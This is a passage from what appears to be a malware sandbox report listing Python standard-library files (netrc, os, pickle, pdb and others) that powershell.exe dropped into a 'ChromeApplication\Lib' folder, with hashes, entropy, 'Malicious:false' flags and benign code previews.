                                                                                                                                                                                                  Preview:"""Find modules used by a script, using introspection."""....import dis..import importlib._bootstrap_external..import importlib.machinery..import marshal..import os..import io..import sys......LOAD_CONST = dis.opmap['LOAD_CONST']..IMPORT_NAME = dis.opmap['IMPORT_NAME']..STORE_NAME = dis.opmap['STORE_NAME']..STORE_GLOBAL = dis.opmap['STORE_GLOBAL']..STORE_OPS = STORE_NAME, STORE_GLOBAL..EXTENDED_ARG = dis.EXTENDED_ARG....# Old imp constants:...._SEARCH_ERROR = 0.._PY_SOURCE = 1.._PY_COMPILED = 2.._C_EXTENSION = 3.._PKG_DIRECTORY = 5.._C_BUILTIN = 6.._PY_FROZEN = 7....# Modulefinder does a good job at simulating Python's, but it can not..# handle __path__ modifications packages make at runtime. Therefore there..# is a mechanism whereby you can register extra paths in this map for a..# package, and it will be honored.....# Note this is a mapping is lists of paths...packagePathMap = {}....# A Public interface..def AddPackagePath(packagename, path):.. packagePathMap.setdefault(packagena

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\netrc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5890
                                                                                                                                                                                                  Entropy (8bit):3.96552069041763
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:D94/ctpvs4RG9Q9TEHV0PhzqDGTfSLIOIqGf:D97Xvs4RGW9IHV2h2DGzSLIbf
                                                                                                                                                                                                  MD5:C58FE7C3FE3A0411A80C2969CC3D984F
                                                                                                                                                                                                  SHA1:9C23179052BFB6BBE11FE64A841F7105D3F422C7
                                                                                                                                                                                                  SHA-256:F25C823F35566AC08A0A16D965A2D73685A29328976E27A7B95F2EE5E90491F2
                                                                                                                                                                                                  SHA-512:A4624912B0BF87071437A46CE935FB991A9696D7979AE5603004ABD4ACC0917089893FAAEE2A8648B7F63A221C5DEB6B425881A9B6043126DD647948912A9487
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""An object-oriented interface to .netrc files."""....# Module and documentation by Eric S. Raymond, 21 Dec 1998....import os, shlex, stat....__all__ = ["netrc", "NetrcParseError"]......class NetrcParseError(Exception):.. """Exception raised on syntax errors in the .netrc file.""".. def __init__(self, msg, filename=None, lineno=None):.. self.filename = filename.. self.lineno = lineno.. self.msg = msg.. Exception.__init__(self, msg).... def __str__(self):.. return "%s (%s, line %s)" % (self.msg, self.filename, self.lineno)......class netrc:.. def __init__(self, file=None):.. default_netrc = file is None.. if file is None:.. file = os.path.join(os.path.expanduser("~"), ".netrc").. self.hosts = {}.. self.macros = {}.. try:.. with open(file, encoding="utf-8") as fp:.. self._parse(file, fp, default_netrc).. except UnicodeDecodeError:.. with open(file, enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\nntplib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42113
                                                                                                                                                                                                  Entropy (8bit):4.583525592980188
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:qPzJzOekTQNd2n1/xwEtyvLrQiIVnt7P+QVE:wzJOnGo1pzsa1PRO
                                                                                                                                                                                                  MD5:4D192F40E33C404168DDF0E1C27660AC
                                                                                                                                                                                                  SHA1:CB959A526E74C36557F164BE65E365CC9E305909
                                                                                                                                                                                                  SHA-256:5AE0C8F0379E3905D5A7A7DE6716C4B48DD7638D02870AFC7C5542231DE2E001
                                                                                                                                                                                                  SHA-512:D44DEF654244C7B0A61114DD8F78363A971B10193B6C009D726002A636D1D0535263373F11117183729DE80D8D2C48134E1740CC2589B3B056BA0B272DBF7BF1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""An NNTP client class based on:..- RFC 977: Network News Transfer Protocol..- RFC 2980: Common NNTP Extensions..- RFC 3977: Network News Transfer Protocol (version 2)....Example:....>>> from nntplib import NNTP..>>> s = NNTP('news')..>>> resp, count, first, last, name = s.group('comp.lang.python')..>>> print('Group', name, 'has', count, 'articles, range', first, 'to', last)..Group comp.lang.python has 51 articles, range 5770 to 5821..>>> resp, subs = s.xhdr('subject', '{0}-{1}'.format(first, last))..>>> resp = s.quit()..>>>....Here 'resp' is the server response line...Error responses are turned into exceptions.....To post an article from a file:..>>> f = open(filename, 'rb') # file containing article, including header..>>> resp = s.post(f)..>>>....For descriptions of all methods, read the comments in the code below...Note that all arguments and return values representing article numbers..are strings, not numbers, since they are rarely used for calculations..."""....# RFC 977 by Brian

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ntpath.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30319
                                                                                                                                                                                                  Entropy (8bit):4.519975623661739
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:oLxZcGnP1MszeSgz6CcuKky5TGjg8BNRKUa:s/3tCXzCuKky5L8vRKf
                                                                                                                                                                                                  MD5:7D31906AFDC5E38F5F63BFEEB41E2EF2
                                                                                                                                                                                                  SHA1:BBEFD95B28BAC9E58E1F1201AE2B39BBE9C17E5F
                                                                                                                                                                                                  SHA-256:E34494AF36D8B596C98759453262D2778A893DAA766F96E1BB1EF89D8B387812
                                                                                                                                                                                                  SHA-512:641B6B2171BB9AAE3603BE2CBCC7DD7D45968AFEB7E0A9D65C914981957BA51B2A1B7D4D9C6AEC88CF92863844761ACCDECA62DB62A13D2BC979E5279D7F87A0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Module 'ntpath' -- common operations on WinNT/Win95 pathnames.."""Common pathname manipulations, WindowsNT/95 version.....Instead of importing this module directly, import os and refer to this..module as os.path..."""....# strings representing various path-related bits and pieces..# These are primarily for export; internally, they are hardcoded...# Should be set before imports for resolving cyclic dependency...curdir = '.'..pardir = '..'..extsep = '.'..sep = '\\'..pathsep = ';'..altsep = '/'..defpath = '.;C:\\bin'..devnull = 'nul'....import os..import sys..import stat..import genericpath..from genericpath import *......__all__ = ["normcase","isabs","join","splitdrive","split","splitext",.. "basename","dirname","commonprefix","getsize","getmtime",.. "getatime","getctime", "islink","exists","lexists","isdir","isfile",.. "ismount", "expanduser","expandvars","normpath","abspath",.. "curdir","pardir","sep","pathsep","defpath","altsep",.. "

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\nturl2path.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2968
                                                                                                                                                                                                  Entropy (8bit):4.64153878996554
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:+W5wriD8gp26M8OjPZwZj33dyEUfIkiQ1J+4oEL8MyqBlJQGn7Iqaqy:+We2D3HM8OjPaDefIp74eMyqh+2y
                                                                                                                                                                                                  MD5:1E561E1AD3FE73F57D902D66C695658A
                                                                                                                                                                                                  SHA1:3DD20BA70AEC9AB04A3E69E17D0A2B10ECB43BC6
                                                                                                                                                                                                  SHA-256:AD86C5B0A9D8F82E9129900F69765AD079CBEF670CCFD0B463FBF608E79224AD
                                                                                                                                                                                                  SHA-512:B8E8AB92A11C66FE1A0D40C15F4D1071772EF1B0FBFE8F2A25793F6BD9704BC6BB6103E9FD619874774581E67C02D99D5143DCD6678E69F9C10EC7A3E20086B0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Convert a NT pathname to a file URL and vice versa.....This module only exists to provide OS-specific code..for urllib.requests, thus do not use directly..."""..# Testing is done through test_urllib.....def url2pathname(url):.. """OS-specific conversion from a relative URL of the 'file' scheme.. to a file system path; not recommended for general use.""".. # e.g... # ///C|/foo/bar/spam.foo.. # and.. # ///C:/foo/bar/spam.foo.. # become.. # C:\foo\bar\spam.foo.. import string, urllib.parse.. # Windows itself uses ":" even in URLs... url = url.replace(':', '|').. if not '|' in url:.. # No drive specifier, just convert slashes.. if url[:4] == '////':.. # path is something like ////host/path/on/remote/host.. # convert this to \\host\path\on\remote\host.. # (notice halving of slashes at the start of the path).. url = url[2:].. components = url.split('/').. # make sure not to co

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\numbers.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10741
                                                                                                                                                                                                  Entropy (8bit):4.539923490195961
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:gPOPzegOJGFvwyWWF0/zE0JeCQ29efwBlp7bv7ab4/g:gPOPzevyqzEf2AwfW4I
                                                                                                                                                                                                  MD5:7769EC6B9C5D9BDCB77C0B8C0DD455B7
                                                                                                                                                                                                  SHA1:133C707D9D0A624B0FF3053ABC2E242B19DD4597
                                                                                                                                                                                                  SHA-256:2C6B8B3497379DCA72B20396651DC66E19105E0068617E2278FD4041CE9E1B5E
                                                                                                                                                                                                  SHA-512:6A6626FB1314D17DA1CE1C1E60C45C07B1914C1B3503BB103965024F72D290FBCF6DE9A0664807EAA77458F98B84677D451027EE0E1B95817C9AC79CDA2D2F21
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) for numbers, according to PEP 3141.....TODO: Fill out more detailed documentation on the operators."""....from abc import ABCMeta, abstractmethod....__all__ = ["Number", "Complex", "Real", "Rational", "Integral"]....class Number(metaclass=ABCMeta):.. """All numbers inherit from this class..... If you just want to check if an argument x is a number, without.. caring what kind, use isinstance(x, Number)... """.. __slots__ = ().... # Concrete numeric types must provide their own hash implementation.. __hash__ = None......## Notes on Decimal..## ----------------..## Decimal has all of the methods specified by the Real abc, but it should..## not be registered as a Real because decimals do not interoperate with..## binary floats (i.e. Decimal('3.14') + 2.71828 is undefined). But,..## abstract reals are expected to interoperate (i.e. R1

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\opcode.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6118
                                                                                                                                                                                                  Entropy (8bit):5.48724844773523
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:rAgeOM9nKfM157diUwhKV66jW+SYtpabTB3fYSn3T4yU879+L:kgFMs+Z5R66/SYSbTBPYUD0K9+L
                                                                                                                                                                                                  MD5:456CFAE710FCF7EE289077D31D81C422
                                                                                                                                                                                                  SHA1:CAAF1F38034028E6A82532CC87ADBE2AE87D3D11
                                                                                                                                                                                                  SHA-256:F352006FE369806030FB7A3BD2EF770BE711AEA0C0C4B6A4D983839BF20910E7
                                                                                                                                                                                                  SHA-512:3F426FCD7FD2B8AB74CAA5F6DE4E9A10552FE9A5180D09E69E95BA90C13912148B6517222BC9E5C669F524F8532E7EFD4A214F73AD73F2B33EA350D8E38A9ED7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.."""..opcode module - potentially shared between dis and other modules which..operate on bytecodes (e.g. peephole optimizers)..."""....__all__ = ["cmp_op", "hasconst", "hasname", "hasjrel", "hasjabs",.. "haslocal", "hascompare", "hasfree", "opname", "opmap",.. "HAVE_ARGUMENT", "EXTENDED_ARG", "hasnargs"]....# It's a chicken-and-egg I'm afraid:..# We're imported before _opcode's made...# With exception unheeded..# (stack_effect is not needed)..# Both our chickens and eggs are allayed...# --Larry Hastings, 2013/11/23....try:.. from _opcode import stack_effect.. __all__.append('stack_effect')..except ImportError:.. pass....cmp_op = ('<', '<=', '==', '!=', '>', '>=')....hasconst = []..hasname = []..hasjrel = []..hasjabs = []..haslocal = []..hascompare = []..hasfree = []..hasnargs = [] # unused....opmap = {}..opname = ['<%r>' % (op,) for op in range(256)]....def def_op(name, op):.. opname[op] = name.. opmap[name] = op....def name_op(name, op):.. de

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\operator.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11211
                                                                                                                                                                                                  Entropy (8bit):4.573391166266157
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:oFe9H1gEi2lSRhgnxHKg4qa9lcDxtZifr6Rm6Qatv1S9gEKQbi5rVKVOOcLRJpht:42hwCEKQbi5zoy
                                                                                                                                                                                                  MD5:5CE128B0B666D733F0BE7DFF2DA87F7C
                                                                                                                                                                                                  SHA1:B73F3EA48ADA4ECA01FBED4A2D22076AD03C1F74
                                                                                                                                                                                                  SHA-256:4B14013B84FFE4BE36FC3A4B847006BA1182596612D2A2AB42A6E94FF990B462
                                                                                                                                                                                                  SHA-512:557557F4BF9A6F238340596AA84F079318F96C44E26804A3083A6359C36BDB6CEF5D5A2D5A698202D36BF6B9C7D0D7625B4E2B72B0A4582A78569E104F9F755A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""..Operator Interface....This module exports a set of functions corresponding to the intrinsic..operators of Python. For example, operator.add(x, y) is equivalent..to the expression x+y. The function names are those used for special..methods; variants without leading and trailing '__' are also provided..for convenience.....This is the pure Python implementation of the module..."""....__all__ = ['abs', 'add', 'and_', 'attrgetter', 'concat', 'contains', 'countOf',.. 'delitem', 'eq', 'floordiv', 'ge', 'getitem', 'gt', 'iadd', 'iand',.. 'iconcat', 'ifloordiv', 'ilshift', 'imatmul', 'imod', 'imul',.. 'index', 'indexOf', 'inv', 'invert', 'ior', 'ipow', 'irshift',.. 'is_', 'is_not', 'isub', 'itemgetter', 'itruediv', 'ixor', 'le',.. 'length_hint', 'lshift', 'lt', 'matmul', 'methodcaller', 'mod',.. 'mul', 'ne', 'neg', 'not_', 'or_', 'pos', 'pow', 'rshift',.. 'setitem', 'sub', 'truediv', 'truth', 'xor']....from builtins im

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\optparse.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):62050
                                                                                                                                                                                                  Entropy (8bit):4.459564941363674
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:yG/pFySCc5myk6vLS9021IwMniNxQ5xqSvl:yG/HyfN6o965xlvl
                                                                                                                                                                                                  MD5:847CC0387E4999C3B43BCE251DF2DC18
                                                                                                                                                                                                  SHA1:E7F6ED46A782655CBF381EC06EA05DEBF5506F4C
                                                                                                                                                                                                  SHA-256:5C46C1CCCC32E7778E3AE4F7018D4D713AAA1DBD13210506472C2E6DEE2D4F73
                                                                                                                                                                                                  SHA-512:9BFBF93216DAA4628F3D9D248536B26953F029108D928719C1DB5882EDED5BAC5B715FD5E10FBFD43E0EE948CC1730C0917186F23FD8E5ECBC82C8A7755C1360
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""A powerful, extensible, and easy-to-use option parser.....By Greg Ward <gward@python.net>....Originally distributed as Optik.....For support, use the optik-users@lists.sourceforge.net mailing list..(http://lists.sourceforge.net/lists/listinfo/optik-users).....Simple usage example:.... from optparse import OptionParser.... parser = OptionParser().. parser.add_option("-f", "--file", dest="filename",.. help="write report to FILE", metavar="FILE").. parser.add_option("-q", "--quiet",.. action="store_false", dest="verbose", default=True,.. help="don't print status messages to stdout").... (options, args) = parser.parse_args().."""....__version__ = "1.5.3"....__all__ = ['Option',.. 'make_option',.. 'SUPPRESS_HELP',.. 'SUPPRESS_USAGE',.. 'Values',.. 'OptionContainer',.. 'OptionGroup',.. 'OptionParser',.. 'HelpFormatter',.. 'Indented

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\os.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):40680
                                                                                                                                                                                                  Entropy (8bit):4.577808445819657
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FTfWsLgH74t1vL5VPkBSP53n4pIiwCepY82y76EM6ED6En6En63686A6xMt1iM/:FTWc1tpaIiwl7
                                                                                                                                                                                                  MD5:8180E937086A657D6B15418FF4215C35
                                                                                                                                                                                                  SHA1:232E8F00EED28BE655704ECCDAB3E84D66CC8F53
                                                                                                                                                                                                  SHA-256:521F714DC038E0FAA53E7DE3DBCCAE0631D96A4D2D655F88B970BD8CF29EC750
                                                                                                                                                                                                  SHA-512:A682A8F878791510A27DE3A0E407889D3F37855FB699320B4355B48CB23DE69B89DADD77FDCCA33EF8E5855278E584B8E7947B626D6623C27521D87EAE5A30D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:r"""OS routines for NT or Posix depending on what system we're on.....This exports:.. - all functions from posix or nt, e.g. unlink, stat, etc... - os.path is either posixpath or ntpath.. - os.name is either 'posix' or 'nt'.. - os.curdir is a string representing the current directory (always '.').. - os.pardir is a string representing the parent directory (always '..').. - os.sep is the (or a most common) pathname separator ('/' or '\\').. - os.extsep is the extension separator (always '.').. - os.altsep is the alternate pathname separator (None or '/').. - os.pathsep is the component separator used in $PATH etc.. - os.linesep is the line separator in text files ('\r' or '\n' or '\r\n').. - os.defpath is the default search path for executables.. - os.devnull is the file path of the null device ('/dev/null', etc.)....Programs that import and use 'os' stand a better chance of being..portable between different platforms. Of course, they must then..only use functions that are

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pathlib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51036
                                                                                                                                                                                                  Entropy (8bit):4.4519233536876275
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:luuewaM+l9hHaktD7QBq2mM1E0lpijUSiwHYBKDwx:luuew4FH3D7QBne0lQjUSiwHzwx
                                                                                                                                                                                                  MD5:296F3A27E6D3758364E1F4925A8AC32E
                                                                                                                                                                                                  SHA1:A53DC770A17E23BB66692A44ECD804AA7A3947EF
                                                                                                                                                                                                  SHA-256:7500FE2B8C9BE491C44E5F1DBE4D4E3139037305E0465DF69F08E05E74C2DC94
                                                                                                                                                                                                  SHA-512:4A13256676D59D8DBDF2353309E5699AFC88B4976F2FC3D710D9BDF132FB2216D3B94B52476F4C3D2D856405A66C3C192853812CBA43B851C034C0215D6A1918
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import fnmatch..import functools..import io..import ntpath..import os..import posixpath..import re..import sys..import warnings..from _collections_abc import Sequence..from errno import EINVAL, ENOENT, ENOTDIR, EBADF, ELOOP..from operator import attrgetter..from stat import S_ISDIR, S_ISLNK, S_ISREG, S_ISSOCK, S_ISBLK, S_ISCHR, S_ISFIFO..from urllib.parse import quote_from_bytes as urlquote_from_bytes......__all__ = [.. "PurePath", "PurePosixPath", "PureWindowsPath",.. "Path", "PosixPath", "WindowsPath",.. ]....#..# Internals..#...._WINERROR_NOT_READY = 21 # drive exists but is not accessible.._WINERROR_INVALID_NAME = 123 # fix for bpo-35306.._WINERROR_CANT_RESOLVE_FILENAME = 1921 # broken symlink pointing to itself....# EBADF - guard against macOS `stat` throwing EBADF.._IGNORED_ERROS = (ENOENT, ENOTDIR, EBADF, ELOOP)...._IGNORED_WINERRORS = (.. _WINERROR_NOT_READY,.. _WINERROR_INVALID_NAME,.. _WINERROR_CANT_RESOLVE_FILENAME)....def _ignore_error(exception):..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pdb.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):64975
                                                                                                                                                                                                  Entropy (8bit):4.3364206659285
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:X/9nCVLsvNyYaNGNxJe5gMhjpGeNgxF2F6e1QliUcWQ36ApxGqfghG9G39pM9zzd:XVnCeI9GeNgxYR+Tmzzd
                                                                                                                                                                                                  MD5:46404C083B59F6091A6C037FCCD9AA7E
                                                                                                                                                                                                  SHA1:D1DA36307E4222CAA522ED76BA55281FB8E286EE
                                                                                                                                                                                                  SHA-256:084615A596B417178C36DA179FE5F106079A184D7F10206137CA1D89B7446D91
                                                                                                                                                                                                  SHA-512:455E2FF1AA733AD5CB4A9AB9A5B512C4AFED61EE337084ADBDEF5A45FAA3C432AA01CBF4937E1D98EB1FF80A402393E3085906B33D9C83E582F9A7F4E14922B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#! /usr/bin/env python3...."""..The Python Debugger Pdb..=======================....To use the debugger in its simplest form:.... >>> import pdb.. >>> pdb.run('<a statement>')....The debugger's prompt is '(Pdb) '. This will stop in the first..function call in <a statement>.....Alternatively, if a statement terminated with an unhandled exception,..you can use pdb's post-mortem facility to inspect the contents of the..traceback:.... >>> <a statement>.. <exception traceback>.. >>> import pdb.. >>> pdb.pm()....The commands recognized by the debugger are listed in the next..section. Most can be abbreviated as indicated; e.g., h(elp) means..that 'help' can be typed as 'h' or 'help' (but not as 'he' or 'hel',..nor as 'H' or 'Help' or 'HELP'). Optional arguments are enclosed in..square brackets. Alternatives in the command syntax are separated..by a vertical bar (|).....A blank line repeats the previous command literally, except for..'list', where

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pickle.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):66769
                                                                                                                                                                                                  Entropy (8bit):4.582827313661204
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:f/It2JPYZKT0egjRsk4jOEFvVNVdA2Kn5YIqEIKyNxzXhln:f/lVT0eg1P4jBvVNfA26SBN1H
                                                                                                                                                                                                  MD5:91424AE0A9D1B1AB8074044C19813A21
                                                                                                                                                                                                  SHA1:1EE0E43AE3F897734095B2A80D2055A96F84C4EB
                                                                                                                                                                                                  SHA-256:6799D6E62B61392A6625297FB02CDE322A64713F4050F9171835D20647F430F9
                                                                                                                                                                                                  SHA-512:A76533B62B42816B980E5BAA87F46AF3EF8E944BAC0B6FC5697F35F241FD1F749BBD0801A392F94F4331FF1ED89583313903FBF558535E70CB865921B2BB2505
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Create portable serialized representations of Python objects.....See module copyreg for a mechanism for registering custom picklers...See module pickletools source for extensive comments.....Classes:.... Pickler.. Unpickler....Functions:.... dump(object, file).. dumps(object) -> string.. load(file) -> object.. loads(bytes) -> object....Misc variables:.... __version__.. format_version.. compatible_formats...."""....from types import FunctionType..from copyreg import dispatch_table..from copyreg import _extension_registry, _inverted_registry, _extension_cache..from itertools import islice..from functools import partial..import sys..from sys import maxsize..from struct import pack, unpack..import re..import io..import codecs..import _compat_pickle....__all__ = ["PickleError", "PicklingError", "UnpicklingError", "Pickler",.. "Unpickler", "dump", "dumps", "load", "loads"]....try:.. from _pickle import PickleBuffer.. __all__.append("PickleBuffer"

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pickletools.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):96376
                                                                                                                                                                                                  Entropy (8bit):4.70927586282489
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:2eNm/Sv/H0mLaWZ5PZFACL/Vx3yRF6lceF0nL13:2eNmyceE3
                                                                                                                                                                                                  MD5:BF481644934BC14B72C7A9CFAF9C0A2E
                                                                                                                                                                                                  SHA1:A411AE3DD3AE3DF53B214DB31FC13AB7233554EC
                                                                                                                                                                                                  SHA-256:D9BB042BC26DAD7A99D1A1ADB3ACEE7C3E93D8B6F5068B55D9B55B6FF3CCD620
                                                                                                                                                                                                  SHA-512:C4C77D5396FA79D671607F8BEFE5ED15C1FCEC1BC306653380608E611383C38E96FEBD07C176308D40A553FDE86EBC1150CD7E2D2586D0067BF28E1343A45718
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:'''"Executable documentation" for the pickle module.....Extensive comments about the pickle protocols and pickle-machine opcodes..can be found here. Some functions meant for external use:....genops(pickle).. Generate all the opcodes in a pickle, as (opcode, arg, position) triples.....dis(pickle, out=None, memo=None, indentlevel=4).. Print a symbolic disassembly of a pickle...'''....import codecs..import io..import pickle..import re..import sys....__all__ = ['dis', 'genops', 'optimize']....bytes_types = pickle.bytes_types....# Other ideas:..#..# - A pickle verifier: read a pickle and check it exhaustively for..# well-formedness. dis() does a lot of this already...#..# - A protocol identifier: examine a pickle and return its protocol number..# (== the highest .proto attr value among all the opcodes in the pickle)...# dis() already prints this info at the end...#..# - A pickle optimizer: for example, tuple-building code is sometimes more..# elaborate than necessary, cater

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pipes.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9161
                                                                                                                                                                                                  Entropy (8bit):4.618151645678958
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dNkrAzSFOVVuP49BSMIt57PMd3heQim6VmGJbIDhP7W8O6xVSjfvEoebDAMnV/mR:dNkrAzSYVVuE+Hxm0RIP5rhat8Mv
                                                                                                                                                                                                  MD5:A812BEB990E7B1DA92F3F62C529CBE61
                                                                                                                                                                                                  SHA1:EFDAFCFC9C646CEF34E86A77912D2F8BD42F1486
                                                                                                                                                                                                  SHA-256:2C1DEC7CF7DE19B9BE20982F5EA36B3DD0601C1610AF4F07E8F8D4F987CBFCAD
                                                                                                                                                                                                  SHA-512:C69F37CF28E0246C50CE85F03B2921AA3F4EAC9291E01C91C1CD493C01774377504E147F731CAADC07ECCB869DB4F331DA13AD814AAD50E37579E3A0F14D13F0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Conversion pipeline templates.....The problem:..------------....Suppose you have some data that you want to convert to another format,..such as from GIF image format to PPM image format. Maybe the..conversion involves several steps (e.g. piping it through compress or..uuencode). Some of the conversion steps may require that their input..is a disk file, others may be able to read standard input; similar for..their output. The input to the entire conversion may also be read..from a disk file or from an open file, and similar for its output.....The module lets you construct a pipeline template by sticking one or..more conversion steps together. It will take care of creating and..removing temporary files if they are necessary to hold intermediate..data. You can then use the template to do conversions from many..different sources to many different destinations. The temporary..file names used are different each time the template is used.....The templates are objects so you can creat

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pkgutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25291
                                                                                                                                                                                                  Entropy (8bit):4.42914607165026
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ubpsSPckq/vGkbcgDeywNuTvly2aGqMuUtC+hjx0UtkGG1FIzN1MVhOsV:ubaSP8smkgBNjWz1Fht
                                                                                                                                                                                                  MD5:1EEEC51079475A5A1337FC8C5DF7889F
